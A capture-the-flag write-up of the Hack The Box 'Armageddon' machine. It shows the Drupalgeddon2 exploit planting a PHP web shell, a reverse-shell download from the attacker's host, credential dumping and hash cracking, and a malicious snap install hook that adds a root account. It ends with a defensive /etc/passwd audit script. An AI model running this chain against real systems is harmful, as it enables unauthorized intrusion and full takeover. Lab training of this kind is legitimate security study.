HTB: Armageddon
Recon
First I started this machine with an nmap scan
$cat nmap-scan
# Nmap 7.91 scan initiated Thu Apr 29 15:37:49 2021 as: nmap -A -oN nmap-scan -v 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up (0.020s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 29 15:38:00 2021 -- 1 IP address (1 host up) scanned in 10.70 seconds
Shell as Apache
The nmap scan showed the site was running Drupal 7, so I used the drupalgeddon2 tool (https://github.com/dreadlocked/Drupalgeddon2) to test for well-known Drupal vulnerabilities. Running it showed the machine was vulnerable to remote code execution:
$ruby drupalgeddon2.rb http://10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo HMZIJPZB
[+] Result : HMZIJPZB
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.233/shell.php)
[!] Response: HTTP 200 // Size: 6. ***Something could already be there?***
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> whoami
apache
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
armageddon.htb>>
Next I used curl on the machine (wget wasn’t installed) to download a PHP reverse shell and put it in the web directory, although you don’t actually need to do this.
I used the PHP reverse shell found at /usr/share/webshells/php/php-reverse-shell.php and made sure to change the IP address and port number to those of my local machine.
First I used Python’s SimpleHTTPServer to host the PHP reverse shell with the command
$sudo python -m SimpleHTTPServer 80
armageddon.htb>> curl http://10.10.16.91/php-reverse-shell.php -o php-reverse-shell.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5493 100 5493 0 0 42169 0 --:--:-- --:--:-- --:--:-- 42253
armageddon.htb>>
Apache => brucetherealadmin
Next I enumerated the Drupal configuration file at /var/www/html/sites/default/settings.php and found the MySQL login credentials:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
From here I was a little stuck trying to get a PTY reverse shell so that I could access the MySQL database and start enumerating it. I didn’t find any way to do that, so instead I executed commands in mysql using the “-e” argument, which worked a charm and let me get the password hash of brucetherealadmin:
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal;select * from users;"
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1619728537 1619728537 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
armageddon.htb>>
Next I copied the password hash and cracked it using hashcat and the rockyou wordlist. But first I used hashid to identify the hash, which confirmed it was a Drupal 7 hash:
$hashid hash.txt
--File 'hash.txt'--
Analyzing '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt'
[+] Drupal > v7.x
--End of file 'hash.txt'--
Looking at the example hashes on the hashcat website (https://hashcat.net/wiki/doku.php?id=example_hashes), the mode I needed for a Drupal 7 hash was 7900.
Next I used hashcat to crack the hash, which gave me the password booboo:
$hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz, 3300/3364 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
INFO: All hashes found in potfile! Use --show to display them.
Started: Fri Apr 30 08:44:46 2021
Stopped: Fri Apr 30 08:44:47 2021
┌─[purplerabbit@kali]─[~/Documents/htb/armageddon]
└──╼ $hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt --show
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
With this password I used SSH to access the machine as the brucetherealadmin user.
Brucetherealadmin => root
The first thing I did was run sudo -l to see if I could run any commands as the root user, and found I could run snap install with sudo:
$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
Looking at the GTFOBins page for snap (https://gtfobins.github.io/gtfobins/snap/#sudo) for how to exploit this, I could install fpm on my local machine and use it to build a malicious snap package to install on the remote machine.
To install fpm I followed the instructions at https://fpm.readthedocs.io/en/latest/installing.html, using the following commands on my local Kali machine:
sudo apt-get install ruby ruby-dev rubygems build-essential
and
gem install --no-document fpm
Next, for the COMMAND variable I had the install hook append a new UID 0 user whose password I knew to /etc/passwd, so I used
$COMMAND="echo root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash >> /etc/passwd"
┌─[purplerabbit@kali]─[~/Documents/htb/armageddon]
└──╼ $cd $(mktemp -d)
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $mkdir -p meta/hooks
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $chmod +x meta/hooks/install
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $fpm -n xxxx -s dir -t snap -a all meta
Created package {:path=>"xxxx_1.0_all.snap"}
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $sudo python -m SimpleHTTPServer 80
[sudo] password for purplerabbit:
Serving HTTP on 0.0.0.0 port 80 ...
With the package generated I transferred it to the machine using curl and Python’s SimpleHTTPServer and then ran the install:
$ curl http://10.10.16.91/xxxx_1.0_all.snap -o xxxx_1.0_all.snap
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4096 100 4096 0 0 99k 0 --:--:-- --:--:-- --:--:-- 105k
[brucetherealadmin@armageddon ~]$ ls
user.txt xxxx_1.0_all.snap
[brucetherealadmin@armageddon ~]$ sudo snap install xxxx_1.0_all.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "xxxx" snap if present (run hook "install": exit status 1)
[brucetherealadmin@armageddon ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash
[brucetherealadmin@armageddon ~]$ su - root2
Password:
Last login: Thu Apr 29 17:18:50 BST 2021 on pts/1
[root@armageddon ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@armageddon ~]#
With that I got root on the machine!
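As an added defender-side example (not part of the original write-up), the following Python audit parses /etc/passwd and flags exactly the kind of entry the snap install hook appended above: a second UID 0 account carrying an inline legacy DES crypt hash instead of the shadow marker. The sample rows are constructed from the dump shown above.

```python
import re

# Constructed from the /etc/passwd dump above, trimmed to the rows that matter.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOW_MARKERS = {'x', '*', '!', '!!'}
DES_CRYPT = re.compile(r'^[./0-9A-Za-z]{13}$')  # traditional DES crypt(3), no $id$ prefix


def audit_passwd(text: str) -> dict:
    """Map each suspicious account to the list of reasons it was flagged."""
    findings = {}

    def flag(user, reason):
        findings.setdefault(user, []).append(reason)

    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            flag(f'line {lineno}', f'malformed entry with {len(fields)} fields')
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            flag(user, 'non-numeric UID')
            continue
        if int(uid) == 0 and user != 'root':
            flag(user, 'extra UID 0 account')
        if pw == '':
            flag(user, 'empty password field (login without password)')
        elif pw not in SHADOW_MARKERS:
            flag(user, 'password hash stored in /etc/passwd instead of /etc/shadow')
            if DES_CRYPT.match(pw):
                flag(user, 'legacy DES crypt hash')
    return findings
```

Running it against the real file (`audit_passwd(open('/etc/passwd').read())`) on a clean CentOS host returns an empty dict; the root2 row above produces three findings.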